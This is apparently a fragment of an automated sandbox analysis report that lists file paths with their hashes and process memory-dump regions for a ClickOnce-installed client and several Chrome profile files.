C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\Client.en-US.resources

MD5 e5d912067630d3efe53f290b9c9d0d27
SHA1 b0fc2105716c6eab770f89b9ed88ce2a36bdb5b2
SHA256 a023527e773b886fb64c5f31de484f659c5816cf4ab696be7c98a3ea4de57d41
SHA512 13fcb0f3f0208c072c86f1df8efe73cfade2803bc4b04e666787a95e10f49289fe6c1b8e10e7dbb5071cae92345fa12139fc220dc23dee4b098cc77fc53a316b

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\Client.Override.en-US.resources

MD5 953c4cbb0ff640008d2402eebf774c6c
SHA1 620c6df6ed6edae888c160b26a4791a91336c27f
SHA256 12191483feb8db21c4b7ecd039be74de31710326b9ff1466d9bd6f53329259f6
SHA512 f992b3b9d284845e1b996d4ae6997834c289471d9ae2b5f912f8bb7d53379b3f3b611a12a1dad66e916b072bc1b6eed3071e109d71e80df190735680c388f61c

memory/1188-629-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/1188-631-0x0000000000BD0000-0x0000000000BE4000-memory.dmp

memory/1188-630-0x000000001AFC0000-0x000000001AFD0000-memory.dmp

memory/1052-633-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/1052-634-0x0000000000AB0000-0x0000000000AC0000-memory.dmp

memory/1052-635-0x0000000000A70000-0x0000000000A84000-memory.dmp

memory/1052-639-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/4224-640-0x00000000741A0000-0x0000000074950000-memory.dmp

memory/4224-641-0x00000000042C0000-0x00000000042D0000-memory.dmp

memory/1188-642-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/4224-643-0x00000000042C0000-0x00000000042D0000-memory.dmp

memory/1188-644-0x000000001AFC0000-0x000000001AFD0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 6cbdb36a2a86b7ad903a296afa1cd820
SHA1 61fac4acec32b16520e5288faae1b2bb8623764e
SHA256 5a26c6182fa43e48c645b76e87ccb9d92f95ddbd3a40b294e1fe2469e65dcf8a
SHA512 37f6ffd59dff0065e6b5e2f01af8a7ab649b7af42279993c071cce36ee259f745f7aeb7d3cd60af459f1967db0797340072bb280b9b03903d09da7913befaff2

memory/1592-657-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

memory/1592-658-0x000000001BBF0000-0x000000001BC00000-memory.dmp

memory/4800-661-0x0000000004B90000-0x0000000004BA0000-memory.dmp

memory/4800-662-0x0000000004B90000-0x0000000004BA0000-memory.dmp

memory/4800-660-0x00000000741A0000-0x0000000074950000-memory.dmp

memory/4800-663-0x00000000741A0000-0x0000000074950000-memory.dmp

memory/1592-673-0x00007FFAB7B40000-0x00007FFAB8601000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c5e29f99b63ca3c93229c5d37228b003
SHA1 61e838b07ffddc62c988d6ef27c7bfdd6ba7efc0
SHA256 70130367091f4f3d43f1c1f17a7410df238a6f7436cffea31651faff6ac046de
SHA512 131a96b5bd8b8e6e4a81b7b3fe846fcccc2531fe7d010e6702f907485326ec9531ceec6c2ac019b1f966b1f41b620983ebc738ae1d30a510b2f4df90a2e62d60

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 7650aa05cbb3ad4f89c64478aab896bb
SHA1 298547db240c76bb5fa2b9be7725ed585c3281d9
SHA256 cc68a918a4b990ee2c87d768f58b5beda71217ef1b049a008f040a6293e273e8
SHA512 8bd32450dceb97732f9bdf5739f1a45fbecc2841f361d8c3486ca03b86650d03e930c00f208ee5573fe3dbc9fd1a56276d0eca0deba55021e42308881340a3d2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 9557383c93dc30c12663a49af3cfb0a5
SHA1 62b9388a6cfc979037d8ca8290343a3586ec84a3
SHA256 17a52dd430d621601d6c4f9507e252375408b5d13a1ef5df7dd4efcc52665f73
SHA512 25b4c058def8adca2cff34dda15664c24cda5b39b16eb1e41d6cf4f8ead2b7b42298ab3ba21df5fb85fb70321b2a42a133675d233281c1249ce5a75406b236a7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 605e4a94bf4a77ec63b41ee36e6ba0fa
SHA1 2db6811f100eb1a817b55e831e8e5c870bf6ac02
SHA256 b0da46a640a02f69fa40ddd2e14949c35d24e8c82c2f896f9a134021f2761ef7
SHA512 19a0acf3deb7b7cabbe494c30dea8629c0371c557c9a007e285d7afb8de21ed500df3452b386db1ad3cd05df56fee360ee4487bce6142ce953b37d71ca352f55

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 e4cf666539c2c53a74725c5363eab17b
SHA1 502ce31f888879eb812273c46785f08e2f6b51f8
SHA256 2a6291b73b770be267c4b1fafd60bc350310a032b217936698b4455ceaafeefa
SHA512 f781f56a1501c010277d6c3ed0d08ac98ac797255e641102204e37648911762eceab8ffb8a7cedf3d10a2bdc32691840cde624f0f7cb90afc565fc7f5d48d430

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 535179563c3b9a41741178a9996f9221
SHA1 fa607db0401a3f32b395b3d7ffc95b79a24b2308
SHA256 71e2559ebe537ba694e433aa33e2f4e25c097023d1abebe48f71d5463c66654d
SHA512 3ee05087482f3697e1051d2c7409bc2ac49139a2a0be0de3c9ad4cc61f0a20e88cdb29f30f340881c771cb3d5f7151c39d54ea07475d170bc0f6122373786341